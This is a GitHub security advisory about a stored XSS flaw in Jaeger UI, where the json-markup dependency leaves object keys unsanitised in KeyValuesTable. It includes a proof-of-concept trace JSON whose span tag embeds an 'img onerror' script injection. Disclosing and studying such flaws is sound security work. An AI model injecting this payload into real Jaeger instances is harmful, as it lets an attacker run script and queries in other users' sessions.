You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries
Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.
Related UI vulnerability advisory: GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the
json-markupdependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus theKeyValuesTableis vulnerable to XSS.Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
{ "data": [ { "traceID": "076ef819cc06c45a", "spans": [ { "traceID": "076ef819cc06c45a", "spanID": "076ef819cc06c45a", "flags": 1, "operationName": "and open 'attributes'", "references": [], "startTime": 1678196149232010, "duration": 13485, "tags": [ { "key": "sampler.type", "type": "string", "value": "{\"<img src=x onerror=alert(1)>\":\"test\"}" } ], "logs": [], "processID": "p1", "warnings": null } ], "processes": { "p1": { "serviceName": "click here", "tags": [ ] } }, "warnings": null } ], "total": 0, "limit": 0, "offset": 0, "errors": null }Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
References